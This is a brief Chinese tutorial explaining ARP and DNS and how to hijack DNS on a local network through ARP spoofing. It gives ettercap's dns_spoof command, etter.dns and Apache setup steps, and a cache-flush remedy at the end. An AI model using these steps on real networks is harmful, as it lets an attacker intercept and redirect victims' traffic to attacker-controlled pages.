DNS劫持的两种基本协议
ARP(Address Resolution Protocol)就是地址解析协议,是一种将IP地址转化成物理地址的协议。在局域网中,主机之间的通信地址通过Mac地址,主机A想和主机B进行通信,首先主机A会在本地的ARP缓存列表里面找主机B的Mac地址,如果能找到,则两个主机会直接进行通信。如果没有找到arp缓存,主机A会广播一个报文,这个报文里面有两个内容:一个是主机A的ip,一个是主机A的Mac地址。这个报文会在整个网络中传送,但主机A只想和B连通,所以这个报文的请求地址就是B的ip地址,B发现有主机请求自己,就会回应这个请求,此时,A主机得到B的回应就会发现B所在的Mac地址,然后更新自己的arp缓存,接着使用这个新的Mac地址和B进行通信。
DNS,全称为域名解析协议,是一种将域名解析为ip地址的协议,基于UDP的53端口。访问某网站的ip或域名,会先向dns服务器发送一次dns请求报文,dns服务器经过查询(或递归查询)会将域名以及对应的ip地址以dns响应报文的形式发回给我们,然后我们才可以与所对应的ip建立TCP连接进行网络通信。dns劫持建立在arp欺骗的基础上, 攻击者通过伪装成网关, 劫持受害者的网络请求, 将网络请求拦截到指定的服务器。其基于ARP欺骗,arp欺骗可以监听受害者机器到网关之间的流量,若过滤协议为UDP,端口为53端口的数据报文(DNS报文),并且将dns响应中的域名所对应的ip地址改写成我们服务器的ip,受害者机器就会与我们的机器进行连接通信。
ettercap是一个基于ARP地址欺骗方式的网络嗅探工具,主要适用于交换局域网络。
配置本地dns文件(使被攻击者访问的所有域名全部转换成本地ip)
命令 /etc/ettercap/etter.dns
命令 vim /var/www/html/index.html 编写网页文档 (若第一步ip为本机,那么被攻击者将直接访问到这个网页的内容)
// 错误解决方案之一 修改ettercap的配置文件 /etc/ettercap/etter.conf 将uid和gid改成 0 然后保存
开启Apache2 服务,可使设备被当做服务器
Apache源于A patchy server的读音,意思是充满补丁的服务器。如今Apache慢慢地已经成为Internet上最流行的Web服务器软件了。在所有的Web服务器软件中,Apache占据绝对优势,远远领先排名第二的Microsoft IIS。Apache作为自由软件之一,像其他自由软件一样,他们都是由许许多多的自由开发人员投入了大量的时间和精力来实现并逐步完善的,所以我们有理由相信Apache的发展前景会更好。 ——百度百科
命令 service apache2 start 开启
service apache2 status 查看状态
service apache2 stop 关闭
开始dns劫持 (已完成arp欺骗)
命令 ettercap -i eth0 -Tp -M arp:remote -P dns_spoof /被攻击者ip// /被攻击者网关//
/// /// 代表全网段ip地址
————————结束
遇到DNS劫持解决办法:
打开cmd命令行输入ipconfig /flushdns,刷新dns缓存即可。